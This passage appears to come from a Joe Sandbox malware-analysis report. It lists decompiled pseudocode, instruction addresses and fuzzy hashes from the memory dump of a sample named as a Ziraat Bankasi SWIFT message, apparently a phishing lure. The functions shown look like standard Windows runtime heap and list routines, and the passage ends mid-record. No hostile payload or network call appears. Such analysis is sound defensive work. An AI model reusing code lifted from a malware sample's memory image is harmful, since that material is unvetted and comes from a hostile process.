                                                                    				if(_t19 != 0) {
                                                                    					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                    				} else {
                                                                    					_t22 = 0x7ffe0384;
                                                                    				}
                                                                    				_t42 = 0x7ffe0385;
                                                                    				if( *_t22 != 0) {
                                                                    					if(E018B7D50() == 0) {
                                                                    						_t24 = 0x7ffe0385;
                                                                    					} else {
                                                                    						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                    					}
                                                                    					if(( *_t24 & 0x00000010) != 0) {
                                                                    						goto L17;
                                                                    					} else {
                                                                    						goto L3;
                                                                    					}
                                                                    				} else {
                                                                    					L3:
                                                                    					_t27 = E018B7D50();
                                                                    					if(_t27 != 0) {
                                                                    						_t27 =  *[fs:0x30];
                                                                    						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                                                                    					}
                                                                    					if( *_t38 != 0) {
                                                                    						_t27 =  *[fs:0x30];
                                                                    						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                                                                    							goto L5;
                                                                    						}
                                                                    						_t27 = E018B7D50();
                                                                    						if(_t27 != 0) {
                                                                    							_t27 =  *[fs:0x30];
                                                                    							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                                                                    						}
                                                                    						if(( *_t42 & 0x00000020) != 0) {
                                                                    							L17:
                                                                    							_t25 = _v8;
                                                                    							_t36 = 0;
                                                                    							if(_t25 != 0) {
                                                                    								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                                                                    							}
                                                                    							_t27 = E01917794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                                                                    						}
                                                                    						goto L5;
                                                                    					} else {
                                                                    						L5:
                                                                    						return _t27;
                                                                    					}
                                                                    				}
                                                                    			}













                                                                    0x018bae78
                                                                    0x018bae7c
                                                                    0x018bae7e
                                                                    0x018bae81
                                                                    0x018bae86
                                                                    0x018bae8d
                                                                    0x01902691
                                                                    0x018bae93
                                                                    0x018bae93
                                                                    0x018bae93
                                                                    0x018bae98
                                                                    0x018bae9d
                                                                    0x019026a2
                                                                    0x019026b4
                                                                    0x019026a4
                                                                    0x019026ad
                                                                    0x019026ad
                                                                    0x019026b9
                                                                    0x00000000
                                                                    0x019026bb
                                                                    0x00000000
                                                                    0x019026bb
                                                                    0x018baea3
                                                                    0x018baea3
                                                                    0x018baea3
                                                                    0x018baeaa
                                                                    0x019026c0
                                                                    0x019026c9
                                                                    0x019026c9
                                                                    0x018baeb3
                                                                    0x019026d4
                                                                    0x019026e1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x019026e7
                                                                    0x019026ee
                                                                    0x019026f0
                                                                    0x019026f9
                                                                    0x019026f9
                                                                    0x01902702
                                                                    0x01902708
                                                                    0x01902708
                                                                    0x0190270b
                                                                    0x0190270f
                                                                    0x01902711
                                                                    0x01902711
                                                                    0x01902725
                                                                    0x01902725
                                                                    0x00000000
                                                                    0x018baeb9
                                                                    0x018baeb9
                                                                    0x018baebf
                                                                    0x018baebf
                                                                    0x018baeb3

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                    • Instruction ID: 8da6037801a40e82b0d70156a2a3cbd12220b36357fc7af6756afc04e3eb4e80
                                                                    • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                    • Instruction Fuzzy Hash: 3821C2326016859FE7179B6CC988B6577E9AF44354F1900A1DD08CB7D2D734ED40C691
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 93%
                                                                    			E018CFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				void* _t19;
                                                                    				intOrPtr _t29;
                                                                    				intOrPtr _t32;
                                                                    				intOrPtr _t35;
                                                                    				intOrPtr _t37;
                                                                    				intOrPtr* _t40;
                                                                    
                                                                    				_t35 = __edx;
                                                                    				_push(__ecx);
                                                                    				_push(__ecx);
                                                                    				_t37 = 0;
                                                                    				_v8 = __edx;
                                                                    				_t29 = __ecx;
                                                                    				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                                                                    					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                                                                    					L3:
                                                                    					_t19 = _a4 - 4;
                                                                    					if(_t19 != 0) {
                                                                    						if(_t19 != 1) {
                                                                    							L7:
                                                                    							return _t37;
                                                                    						}
                                                                    						if(_t35 == 0) {
                                                                    							L11:
                                                                    							_t37 = 0xc000000d;
                                                                    							goto L7;
                                                                    						}
                                                                    						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                                                                    							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                                                                    							_t35 = _v8;
                                                                    						}
                                                                    						 *((intOrPtr*)(_t40 + 4)) = _t35;
                                                                    						goto L7;
                                                                    					}
                                                                    					if(_t29 == 0) {
                                                                    						goto L11;
                                                                    					}
                                                                    					_t32 =  *_t40;
                                                                    					if(_t32 != 0) {
                                                                    						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                                                                    						E018A76E2( *_t40);
                                                                    					}
                                                                    					 *_t40 = _t29;
                                                                    					goto L7;
                                                                    				}
                                                                    				_t40 = L018B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                                                                    				if(_t40 == 0) {
                                                                    					_t37 = 0xc0000017;
                                                                    					goto L7;
                                                                    				}
                                                                    				_t35 = _v8;
                                                                    				 *_t40 = 0;
                                                                    				 *((intOrPtr*)(_t40 + 4)) = 0;
                                                                    				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                                                                    				goto L3;
                                                                    			}










                                                                    0x018cfd9b
                                                                    0x018cfda0
                                                                    0x018cfda1
                                                                    0x018cfdab
                                                                    0x018cfdad
                                                                    0x018cfdb0
                                                                    0x018cfdb8
                                                                    0x018cfe0f
                                                                    0x018cfde6
                                                                    0x018cfde9
                                                                    0x018cfdec
                                                                    0x0190c0c0
                                                                    0x018cfdfe
                                                                    0x018cfe06
                                                                    0x018cfe06
                                                                    0x0190c0c8
                                                                    0x018cfe2d
                                                                    0x018cfe2d
                                                                    0x00000000
                                                                    0x018cfe2d
                                                                    0x0190c0d1
                                                                    0x0190c0e0
                                                                    0x0190c0e5
                                                                    0x0190c0e5
                                                                    0x0190c0e8
                                                                    0x00000000
                                                                    0x0190c0e8
                                                                    0x018cfdf4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018cfdf6
                                                                    0x018cfdfa
                                                                    0x018cfe1a
                                                                    0x018cfe1f
                                                                    0x018cfe1f
                                                                    0x018cfdfc
                                                                    0x00000000
                                                                    0x018cfdfc
                                                                    0x018cfdcc
                                                                    0x018cfdd0
                                                                    0x018cfe26
                                                                    0x00000000
                                                                    0x018cfe26
                                                                    0x018cfdd8
                                                                    0x018cfddb
                                                                    0x018cfddd
                                                                    0x018cfde0
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                    • Instruction ID: 4632b9678a4c2566def71645d84ca798a823450348000b8bc05b12e8bfa9614a
                                                                    • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                    • Instruction Fuzzy Hash: B4215772A00A45DBE731CF0EC540AA6B7A6EB94F10F24816EEA49CB611D730EE00DB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 54%
                                                                    			E018CB390(void* __ecx, intOrPtr _a4) {
                                                                    				signed int _v8;
                                                                    				signed char _t12;
                                                                    				signed int _t16;
                                                                    				signed int _t21;
                                                                    				void* _t28;
                                                                    				signed int _t30;
                                                                    				signed int _t36;
                                                                    				signed int _t41;
                                                                    
                                                                    				_push(__ecx);
                                                                    				_t41 = _a4 + 0xffffffb8;
                                                                    				E018B2280(_t12, 0x1988608);
                                                                    				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                                                    				asm("sbb edi, edi");
                                                                    				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                                                    				_v8 = _t36;
                                                                    				asm("lock cmpxchg [ebx], ecx");
                                                                    				_t30 = 1;
                                                                    				if(1 != 1) {
                                                                    					while(1) {
                                                                    						_t21 = _t30 & 0x00000006;
                                                                    						_t16 = _t30;
                                                                    						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                                                    						asm("lock cmpxchg [edi], esi");
                                                                    						if(_t16 == _t30) {
                                                                    							break;
                                                                    						}
                                                                    						_t30 = _t16;
                                                                    					}
                                                                    					_t36 = _v8;
                                                                    					if(_t21 == 2) {
                                                                    						_t16 = E018D00C2(0x1988608, 0, _t28);
                                                                    					}
                                                                    				}
                                                                    				if(_t36 != 0) {
                                                                    					_t16 = L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                                                    				}
                                                                    				return _t16;
                                                                    			}











                                                                    0x018cb395
                                                                    0x018cb3a2
                                                                    0x018cb3a5
                                                                    0x018cb3aa
                                                                    0x018cb3b2
                                                                    0x018cb3ba
                                                                    0x018cb3bd
                                                                    0x018cb3c0
                                                                    0x018cb3c4
                                                                    0x018cb3c9
                                                                    0x0190a3e9
                                                                    0x0190a3ed
                                                                    0x0190a3f0
                                                                    0x0190a3ff
                                                                    0x0190a403
                                                                    0x0190a409
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0190a40b
                                                                    0x0190a40b
                                                                    0x0190a40f
                                                                    0x0190a415
                                                                    0x0190a423
                                                                    0x0190a423
                                                                    0x0190a415
                                                                    0x018cb3d1
                                                                    0x018cb3e8
                                                                    0x018cb3e8
                                                                    0x018cb3d9

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 381f58eeeba35f8db307be19637a80f5f00680dc4c051e8a984b2fbeaece2eeb
                                                                    • Instruction ID: 073dee562ce17de7147e52562f37b04d96c3a01d16b96e253786ac2debf5d379
                                                                    • Opcode Fuzzy Hash: 381f58eeeba35f8db307be19637a80f5f00680dc4c051e8a984b2fbeaece2eeb
                                                                    • Instruction Fuzzy Hash: DF116B333116109FCB2ADA288D81A6BB3DBEBC5770B29012DDD1ADB3C0C931AD02C6D5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 77%
                                                                    			E01899240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr _t33;
                                                                    				intOrPtr _t37;
                                                                    				intOrPtr _t41;
                                                                    				intOrPtr* _t46;
                                                                    				void* _t48;
                                                                    				intOrPtr _t50;
                                                                    				intOrPtr* _t60;
                                                                    				void* _t61;
                                                                    				intOrPtr _t62;
                                                                    				intOrPtr _t65;
                                                                    				void* _t66;
                                                                    				void* _t68;
                                                                    
                                                                    				_push(0xc);
                                                                    				_push(0x196f708);
                                                                    				E018ED08C(__ebx, __edi, __esi);
                                                                    				_t65 = __ecx;
                                                                    				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                                                    				if( *(__ecx + 0x24) != 0) {
                                                                    					_push( *(__ecx + 0x24));
                                                                    					E018D95D0();
                                                                    					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                                                    				}
                                                                    				L6();
                                                                    				L6();
                                                                    				_push( *((intOrPtr*)(_t65 + 0x28)));
                                                                    				E018D95D0();
                                                                    				_t33 =  *0x19884c4; // 0x0
                                                                    				L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                                                    				_t37 =  *0x19884c4; // 0x0
                                                                    				L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                                                    				_t41 =  *0x19884c4; // 0x0
                                                                    				E018B2280(L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x19886b4);
                                                                    				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                                                    				_t46 = _t65 + 0xe8;
                                                                    				_t62 =  *_t46;
                                                                    				_t60 =  *((intOrPtr*)(_t46 + 4));
                                                                    				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                                                    					_t61 = 3;
                                                                    					asm("int 0x29");
                                                                    					_push(_t65);
                                                                    					_t66 = _t61;
                                                                    					_t23 = _t66 + 0x14; // 0x8df8084c
                                                                    					_push( *_t23);
                                                                    					E018D95D0();
                                                                    					_t24 = _t66 + 0x10; // 0x89e04d8b
                                                                    					_push( *_t24);
                                                                    					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                                                    					_t48 = E018D95D0();
                                                                    					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                                                    					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                                                    					return _t48;
                                                                    				} else {
                                                                    					 *_t60 = _t62;
                                                                    					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                                                    					 *(_t68 - 4) = 0xfffffffe;
                                                                    					E01899325();
                                                                    					_t50 =  *0x19884c4; // 0x0
                                                                    					return E018ED0D1(L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                                                    				}
                                                                    			}















                                                                    0x01899240
                                                                    0x01899242
                                                                    0x01899247
                                                                    0x0189924c
                                                                    0x0189924e
                                                                    0x01899255
                                                                    0x01899257
                                                                    0x0189925a
                                                                    0x0189925f
                                                                    0x0189925f
                                                                    0x01899266
                                                                    0x01899271
                                                                    0x01899276
                                                                    0x01899279
                                                                    0x0189927e
                                                                    0x01899295
                                                                    0x0189929a
                                                                    0x018992b1
                                                                    0x018992b6
                                                                    0x018992d7
                                                                    0x018992dc
                                                                    0x018992e0
                                                                    0x018992e6
                                                                    0x018992e8
                                                                    0x018992ee
                                                                    0x01899332
                                                                    0x01899333
                                                                    0x01899337
                                                                    0x01899338
                                                                    0x0189933a
                                                                    0x0189933a
                                                                    0x0189933d
                                                                    0x01899342
                                                                    0x01899342
                                                                    0x01899345
                                                                    0x01899349
                                                                    0x0189934e
                                                                    0x01899352
                                                                    0x01899357
                                                                    0x018992f4
                                                                    0x018992f4
                                                                    0x018992f6
                                                                    0x018992f9
                                                                    0x01899300
                                                                    0x01899306
                                                                    0x01899324
                                                                    0x01899324

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d445943ac8dde637b053753cd6f9fe703fdddd489d6e11fe9e83a15ea03c4e7b
                                                                    • Instruction ID: 5692cd65bbe0877c1c985cc389e9346f327942b9aaf3b35fc9edd99be7c42311
                                                                    • Opcode Fuzzy Hash: d445943ac8dde637b053753cd6f9fe703fdddd489d6e11fe9e83a15ea03c4e7b
                                                                    • Instruction Fuzzy Hash: 14215932440641DFC722EF6CCA40F59B7F9BF18708F58456CE009CA6A2CB34EA41DB55
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 90%
                                                                    			E01924257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr* _t18;
                                                                    				intOrPtr _t24;
                                                                    				intOrPtr* _t27;
                                                                    				intOrPtr* _t30;
                                                                    				intOrPtr* _t31;
                                                                    				intOrPtr _t33;
                                                                    				intOrPtr* _t34;
                                                                    				intOrPtr* _t35;
                                                                    				void* _t37;
                                                                    				void* _t38;
                                                                    				void* _t39;
                                                                    				void* _t43;
                                                                    
                                                                    				_t39 = __eflags;
                                                                    				_t35 = __edi;
                                                                    				_push(8);
                                                                    				_push(0x19708d0);
                                                                    				E018ED08C(__ebx, __edi, __esi);
                                                                    				_t37 = __ecx;
                                                                    				E019241E8(__ebx, __edi, __ecx, _t39);
                                                                    				E018AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                    				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                                                    				_t18 = _t37 + 8;
                                                                    				_t33 =  *_t18;
                                                                    				_t27 =  *((intOrPtr*)(_t18 + 4));
                                                                    				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                                                                    					L8:
                                                                    					_push(3);
                                                                    					asm("int 0x29");
                                                                    				} else {
                                                                    					 *_t27 = _t33;
                                                                    					 *((intOrPtr*)(_t33 + 4)) = _t27;
                                                                    					_t35 = 0x19887e4;
                                                                    					_t18 =  *0x19887e0; // 0x0
                                                                    					while(_t18 != 0) {
                                                                    						_t43 = _t18 -  *0x1985cd0; // 0xffffffff
                                                                    						if(_t43 >= 0) {
                                                                    							_t31 =  *0x19887e4; // 0x0
                                                                    							_t18 =  *_t31;
                                                                    							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                                                                    								goto L8;
                                                                    							} else {
                                                                    								 *0x19887e4 = _t18;
                                                                    								 *((intOrPtr*)(_t18 + 4)) = _t35;
                                                                    								L01897055(_t31 + 0xfffffff8);
                                                                    								_t24 =  *0x19887e0; // 0x0
                                                                    								_t18 = _t24 - 1;
                                                                    								 *0x19887e0 = _t18;
                                                                    								continue;
                                                                    							}
                                                                    						}
                                                                    						goto L9;
                                                                    					}
                                                                    				}
                                                                    				L9:
                                                                    				__eflags =  *0x1985cd0;
                                                                    				if( *0x1985cd0 <= 0) {
                                                                    					L01897055(_t37);
                                                                    				} else {
                                                                    					_t30 = _t37 + 8;
                                                                    					_t34 =  *0x19887e8; // 0x0
                                                                    					__eflags =  *_t34 - _t35;
                                                                    					if( *_t34 != _t35) {
                                                                    						goto L8;
                                                                    					} else {
                                                                    						 *_t30 = _t35;
                                                                    						 *((intOrPtr*)(_t30 + 4)) = _t34;
                                                                    						 *_t34 = _t30;
                                                                    						 *0x19887e8 = _t30;
                                                                    						 *0x19887e0 = _t18 + 1;
                                                                    					}
                                                                    				}
                                                                    				 *(_t38 - 4) = 0xfffffffe;
                                                                    				return E018ED0D1(L01924320());
                                                                    			}















                                                                    0x01924257
                                                                    0x01924257
                                                                    0x01924257
                                                                    0x01924259
                                                                    0x0192425e
                                                                    0x01924263
                                                                    0x01924265
                                                                    0x01924273
                                                                    0x01924278
                                                                    0x0192427c
                                                                    0x0192427f
                                                                    0x01924281
                                                                    0x01924287
                                                                    0x019242d7
                                                                    0x019242d7
                                                                    0x019242da
                                                                    0x0192428d
                                                                    0x0192428d
                                                                    0x0192428f
                                                                    0x01924292
                                                                    0x01924297
                                                                    0x0192429c
                                                                    0x019242a0
                                                                    0x019242a6
                                                                    0x019242a8
                                                                    0x019242ae
                                                                    0x019242b3
                                                                    0x00000000
                                                                    0x019242ba
                                                                    0x019242ba
                                                                    0x019242bf
                                                                    0x019242c5
                                                                    0x019242ca
                                                                    0x019242cf
                                                                    0x019242d0
                                                                    0x00000000
                                                                    0x019242d0
                                                                    0x019242b3
                                                                    0x00000000
                                                                    0x019242a6
                                                                    0x0192429c
                                                                    0x019242dc
                                                                    0x019242dc
                                                                    0x019242e3
                                                                    0x01924309
                                                                    0x019242e5
                                                                    0x019242e5
                                                                    0x019242e8
                                                                    0x019242ee
                                                                    0x019242f0
                                                                    0x00000000
                                                                    0x019242f2
                                                                    0x019242f2
                                                                    0x019242f4
                                                                    0x019242f7
                                                                    0x019242f9
                                                                    0x01924300
                                                                    0x01924300
                                                                    0x019242f0
                                                                    0x0192430e
                                                                    0x0192431f

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 56e901da980c7ec2889dac64ee9403ad38e95dd20983d362302569072be54aaa
                                                                    • Instruction ID: 536edab8faa6264c02e6b880d9bcef6f9267ba04c93e6ba5d750e1bb217911a4
                                                                    • Opcode Fuzzy Hash: 56e901da980c7ec2889dac64ee9403ad38e95dd20983d362302569072be54aaa
                                                                    • Instruction Fuzzy Hash: 3A21A970A01A12CFCB25EF69D500A18BBF0FB86715BA482AEC109CB699DB31C991CF11
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 25%
                                                                    			E018C2397(intOrPtr _a4) {
                                                                    				void* __ebx;
                                                                    				void* __ecx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed int _t11;
                                                                    				void* _t19;
                                                                    				void* _t25;
                                                                    				void* _t26;
                                                                    				intOrPtr _t27;
                                                                    				void* _t28;
                                                                    				void* _t29;
                                                                    
                                                                    				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                                                                    				if( *0x198848c != 0) {
                                                                    					L018BFAD0(0x1988610);
                                                                    					if( *0x198848c == 0) {
                                                                    						E018BFA00(0x1988610, _t19, _t27, 0x1988610);
                                                                    						goto L1;
                                                                    					} else {
                                                                    						_push(0);
                                                                    						_push(_a4);
                                                                    						_t26 = 4;
                                                                    						_t29 = E018C2581(0x1988610, 0x18750a0, _t26, _t27, _t28);
                                                                    						E018BFA00(0x1988610, 0x18750a0, _t27, 0x1988610);
                                                                    					}
                                                                    				} else {
                                                                    					L1:
                                                                    					_t11 =  *0x1988614; // 0x0
                                                                    					if(_t11 == 0) {
                                                                    						_t11 = E018D4886(0x1871088, 1, 0x1988614);
                                                                    					}
                                                                    					_push(0);
                                                                    					_push(_a4);
                                                                    					_t25 = 4;
                                                                    					_t29 = E018C2581(0x1988610, (_t11 << 4) + 0x1875070, _t25, _t27, _t28);
                                                                    				}
                                                                    				if(_t29 != 0) {
                                                                    					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                                                                    					 *((char*)(_t29 + 0x40)) = 0;
                                                                    				}
                                                                    				return _t29;
                                                                    			}















                                                                    0x018c23b0
                                                                    0x018c23b6
                                                                    0x018c2409
                                                                    0x018c2415
                                                                    0x01905ae9
                                                                    0x00000000
                                                                    0x018c241b
                                                                    0x018c241b
                                                                    0x018c241d
                                                                    0x018c2427
                                                                    0x018c242e
                                                                    0x018c2430
                                                                    0x018c2430
                                                                    0x018c23b8
                                                                    0x018c23b8
                                                                    0x018c23b8
                                                                    0x018c23bf
                                                                    0x018c23fc
                                                                    0x018c23fc
                                                                    0x018c23c1
                                                                    0x018c23c3
                                                                    0x018c23d0
                                                                    0x018c23d8
                                                                    0x018c23d8
                                                                    0x018c23dc
                                                                    0x018c23de
                                                                    0x018c23e1
                                                                    0x018c23e1
                                                                    0x018c23ec

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 014a82f6a35f8f7bce8fb038819df28ae7c0b31b307b64e93088bec242c832a4
                                                                    • Instruction ID: 59dab9aa141e729ee795b265cf7aada34eca01f4baa35a5f3fc0c9acefa0c38e
                                                                    • Opcode Fuzzy Hash: 014a82f6a35f8f7bce8fb038819df28ae7c0b31b307b64e93088bec242c832a4
                                                                    • Instruction Fuzzy Hash: F2112B32744301A7E731A63DAC80B1AB7DABF60F64F54441EF706E72E0C570DA458765
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 93%
                                                                    			E019146A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                                                    				signed short* _v8;
                                                                    				unsigned int _v12;
                                                                    				intOrPtr _v16;
                                                                    				signed int _t22;
                                                                    				signed char _t23;
                                                                    				short _t32;
                                                                    				void* _t38;
                                                                    				char* _t40;
                                                                    
                                                                    				_v12 = __edx;
                                                                    				_t29 = 0;
                                                                    				_v8 = __ecx;
                                                                    				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                                                    				_t38 = L018B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                                                    				if(_t38 != 0) {
                                                                    					_t40 = _a4;
                                                                    					 *_t40 = 1;
                                                                    					E018DF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                                                    					_t22 = _v12 >> 1;
                                                                    					_t32 = 0x2e;
                                                                    					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                                                    					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                                                    					_t23 = E018CD268(_t38, 1);
                                                                    					asm("sbb al, al");
                                                                    					 *_t40 =  ~_t23 + 1;
                                                                    					L018B77F0(_v16, 0, _t38);
                                                                    				} else {
                                                                    					 *_a4 = 0;
                                                                    					_t29 = 0xc0000017;
                                                                    				}
                                                                    				return _t29;
                                                                    			}











                                                                    0x019146b7
                                                                    0x019146ba
                                                                    0x019146c5
                                                                    0x019146c8
                                                                    0x019146d0
                                                                    0x019146d4
                                                                    0x019146e6
                                                                    0x019146e9
                                                                    0x019146f4
                                                                    0x019146ff
                                                                    0x01914705
                                                                    0x01914706
                                                                    0x0191470c
                                                                    0x01914713
                                                                    0x0191471b
                                                                    0x01914723
                                                                    0x01914725
                                                                    0x019146d6
                                                                    0x019146d9
                                                                    0x019146db
                                                                    0x019146db
                                                                    0x01914732

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                    • Instruction ID: 206d417156b06cfa9908eb312b42b47273cc256ceb57096efa1f4c41a4906d6b
